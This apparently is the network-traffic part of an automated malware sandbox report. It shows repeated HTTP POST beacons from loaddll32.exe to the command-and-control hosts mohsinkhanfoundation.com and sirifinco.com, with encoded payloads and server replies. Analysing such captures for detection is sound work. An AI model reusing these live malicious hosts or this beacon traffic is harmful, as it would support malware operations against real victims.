                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          13192.168.2.749776107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:56.568809986 CEST1378OUTPOST /pcQLeLMbur/ITIYRX5yeGV9eXNkeWJ4 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:56.965070963 CEST1378INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:56 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          14192.168.2.749777107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:57.253578901 CEST1380OUTPOST /pcQLeLMbur/OhpCfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:57.677479982 CEST1386INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:57 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+e0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          15192.168.2.749778107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:58.020242929 CEST1399OUTPOST /pcQLeLMbur/DCwZNSYnBRJFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:58.440282106 CEST1400INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:58 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+dEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          16192.168.2.749780107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:59.065896988 CEST1406OUTPOST /pcQLeLMbur/MyYYFB8/BgEuIANyGHgkPAMsGDcYQ3p1fWV7fXRheWR8 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:59.538985968 CEST1416INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:59 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          17192.168.2.749781107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:00.813530922 CEST1417OUTPOST /pcQLeLMbur/egl7fAgEMAQAAkJ7cn5henxzYn1lfQ== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:01.207879066 CEST1419INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:00 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          18192.168.2.749783107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:01.475281954 CEST1427OUTPOST /pcQLeLMbur/KQsyKkZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:01.898823023 CEST1429INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:01 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          19192.168.2.749785107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:02.239057064 CEST1437OUTPOST /pcQLeLMbur/Hh8fPwgIJRkuIzgrOjp5HjovOkZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:02.676656008 CEST1439INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:02 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9fkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.749749162.215.253.1480C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:47.386585951 CEST994OUTPOST /Urbhq9wO50j/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkfA== HTTP/1.1
                                          Host: sirifinco.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:47.528405905 CEST996INHTTP/1.1 406 Not Acceptable
                                          Date: Mon, 27 Sep 2021 18:25:47 GMT
                                          Server: Apache
                                          Content-Length: 226
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 21 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 21 3c 2f 68 31 3e 3c 70 3e 41 6e 20 61 70 70 72 6f 70 72 69 61 74 65 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 54 68 69 73 20 65 72 72 6f 72 20 77 61 73 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 4d 6f 64 5f 53 65 63 75 72 69 74 79 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <head><title>Not Acceptable!</title></head><body><h1>Not Acceptable!</h1><p>An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          20192.168.2.749787107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:02.963524103 CEST1441OUTPOST /pcQLeLMbur/AjlCfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:03.402580023 CEST1448INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:02 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          21192.168.2.749789107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:03.706167936 CEST1450OUTPOST /pcQLeLMbur/OSdCfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:04.129306078 CEST1458INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:03 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
